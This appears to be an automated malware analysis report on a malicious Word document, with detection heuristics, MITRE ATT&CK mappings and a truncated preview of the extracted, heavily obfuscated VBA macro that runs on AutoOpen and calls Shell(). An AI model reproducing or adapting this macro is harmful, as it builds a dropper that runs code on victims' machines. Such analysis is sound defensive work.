Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro calls the Shell() function, a critical indicator of malicious intent, which suggests it is designed to execute arbitrary commands. Because the macro is obfuscated and the recovered source is truncated, a full analysis of its payload is not possible, but its primary function appears to be downloading and executing a secondary stage.
Heuristics (6)
- ClamAV: Doc.Malware.00536d-6699675-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6699675-0
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17087 bytes |
SHA-256: 60b29927852fa7ebeefb21914138a6c46dd57a8484a656c4f8eed4bbff61b41c
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "jILpnlKofP" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim QqsuN(2) QqsuN(0) = Left(fWbGz + bAjTjYBsNhuUSBYiZkIHdI + ImXStId, 119) + Left(zTwPP + MSdmdWlTkkStFLpOVvolqM + sEiKUKdQ, 793) + InStrRev(fQmjaYtn + mSHZBiYhmZVilZPHPpW + KwjLNMzY, GlakThu + RYJhtowdjkVRODtW + pAOBms) + InStrRev(waVzOfRB + GZOUsWQqIWPnXhXujHMdJ + PTCqA, EQlGUHs + cDSjmzQauHkitnnGzo + JcjHv) QqsuN(1) = InStrRev(PBvLk + zTSDcnFFVWqBhnHDvJDC + svfFoW, NnTotL + DaNkFauPIDhfQcijsaAN + UotBzt) + InStrRev(sGdoFP + kpjScqrCMKbucOWkrht + HQmaSc, XXqKjj + IBwljTWEPZiiUXRKLDFZa + EWlrjilG) + Right(ujfotWW + ooDkzOVZaCcYwAiMjrz + HwrmWSh, 682) + Right(ADAmmE + LfjDWnYtrJTKSdDwcw + TFAvnPNr, 152) Dim lsEDZG(2) lsEDZG(0) = InStrRev(YpZDMJoh + IpNEmNzoAIfzBGXOZdpd + DtComzh, zdRjF + DSwpsXCjDRTkFNViUv + AbbrC) + Left(ZRXTZW + qOVAHiNUCjREWKWQzO + ViSdzwQj, 932) lsEDZG(1) = InStrRev(fUwua + NHpWGJuAIDGhQAWoFi + WjlBf, QvwfBJ + YJPFwIcpHGDwYlNjSmUIj + sHJCuPI) + InStrRev(fqdUvutn + zarKjwFpMDATQUjwN + waFXGbIY, NKrCAza + JSpuiKOAZNrjhDdMqczQ + nVWRQW) Dim Zjoqn(1) Zjoqn(0) = InStrRev(BBKitfi + UQaFswBNGWiETRzchk + iBlML, YsOdnIs + ujndhiwwwPbhGoIvDGSk + hiUbQFb) + Right(hzzWaAI + PmKqmZSAwvHbBzzYVjqn + YrSwhuvR, 66) Dim GTsTlK(2) GTsTlK(0) = InStrRev(QRiMz + HRzVAttfVfanwfWcUOzDvB + LdCTk, pItPcvNi + FkPJkalqoOKOCUiIdBvduI + huhHjkFp) + Right(taCQdN + fuquLFijvKGVAEvphiZI + wwIFM, 472) + InStrRev(PdcGmi + GAJfKzsZMhXalirPI + XXblFX, RNNEcY + szDwfAquTXqbTHldmD + VbCuUKWT) + InStrRev(zzSFZoWj + lAuuWttzvLdUDiUdzXzqDi + OhzGG, HVjHYaR + lbUiOWFRJRTmQatiQtoF + wNoVjvi) GTsTlK(1) = InStr(EcKQlr + pwVNVLqwhmJkzVdJRqkOi + FNFJHn, zJUZb + diOwplGHYTiLvEiEFcloawV + MISrHTMB) + Left(fiwGYkn + MuahjWwrtozTJYFcarjDi + aGVNE, 733) + InStrRev(QDlbmVKw + LnMVqAiLiksfUvqzip + bsEJw, PtOvX + 
FQKMZPHmMtwRwpSJjk + CELEOrO) + InStr(QTqZpR + oTGsQzBvuYcOiPIIOVAQX + fziuJX, uRWtlEJ + wpTGlEvhJBFobsUEzAk + hkwGlW) Dim NLLni(1) NLLni(0) = Right(liAhJ + YElfWjOwfhGRKmmdSrYM + AMnbjuOj, 691) + Right(LOFDFwN + YwBzrvjzaArZUHnOlT + XHaIjaN, 854) + InStrRev(GbBLnjF + mInmmhjzLwunBQQVOFkioL + VJUDJ, kYkUoaz + hNlSZkvSkkcBaScNZdHo + RssXc) + Right(OUBaZA + bYlZCIiltWwjSmZQIsoXqp + hZXBSw, 557) Dim VPGui(2) VPGui(0) = InStrRev(iFvjw + CwjXsmAjitAZNrDTiEJW + whtktmS, VFiYkLDa + AhUtmBZcwXtaNwGKpva + smVdWHi) + InStrRev(wVsdoHi + qBacicqHwQqhtAAjP + UuPcrE, zboikz + HABjAinVvLkClJWh + CdXar) VPGui(1) = InStr(Btpisltj + TmhcGwfbtZDZOREWdGJ + lbGdrC, XmCvzk + fuPDPzUQYioJkQJqipP + fDjmLW) + InStrRev(IpwLth + HfNTUZMmsuptSrrXLRi + DQjTlFRT, WJCUE + tRTcfYpzFCJwWZQEtsBQb + rviNmmRU) + Right(vRXrqV + OJEjziEzNwsAshuPVSPsc + VBrNC, 437) + Left(MRkKzp + nDVfQCQKvGhhzRpXhMmKb + jkGWzaq, 705) Dim Zwiwk(2) Zwiwk(0) = InStrRev(cwKGVPti + qkOdKzrDTzZrBHPZwPR + mSAlOS, jozzL + wBGhIwHIawIPFZOs + zqdlXuqC) + Right(MVAazIj + jLsLQKuTjZiSzKdwkB + Grmmd, 661) Zwiwk(1) = Right(pBSGfHfM + AWTdAZcbmincYmUiXo + mjjAo, 846) + InStr(RVfBold + NBHjSCZuYVLiDQotTtkkjG + zWjWIc, nEVTh + FTXUjPNTEkYQYZFjcX + Miwuc) JRqHJIfXTqW (KeyString(hdHjbM + dzfphdo + 12 + 3 + 52 + tOPMMBV + prjPCHAJ) + WldzwBU + hGrithdr + KeyString(VblJj + rNwXo + 14 + 3 + 60 + NCzPOQK + iplzJqh) + OttlUvTz + HTRQQniV + vUXBoEM + jTiwSutU + OBbGNnR) Dim CtFrRi(2) CtFrRi(0) = InStrRev(MjwjQv + HifiOnRZmlsjJCLIFQwis + VjVAhKTK, bcSObrS + HoDSzdFmVIvmSYSlFaZVji + sudZjEv) + InStr(SOWXc + pUmoJuqwtZXiSWCMrVwbr + WAWWB, FjMvi + wmanfYZjfuUQjztszYvUbrwV + KntmNtj) + Left(LSlmErcj + HmUAlRCSzvjClrAiCnOY + iOmqdwL, 689) + InStr(zpnHUn + VtcPpozbwJhsPGDnLp + zBZwvEt, vwCKHP + XdXMaTdkXARAfadOPqX + kvluMGI) CtFrRi(1) = InStrRev(qoLdXZh + WjswOPjAiAJGocfijXS + nJrPr, jTcAO + jVWfFdqUodouuzMRjIEY + OaUqizUw) + InStr(MMrMlSSa + CrJhGlwGfbzOqrCEpIqGvm + rfQqiUWm, mjtCYs + PwAVjwVOdMkNvGQqpzc + UkjvL) Dim zwYWBw(2) zwYWBw(0) = 
InStr(TCIGsZmD + GzHBSZmwBwMstPmpYFo + WmpVzf, s ... (truncated)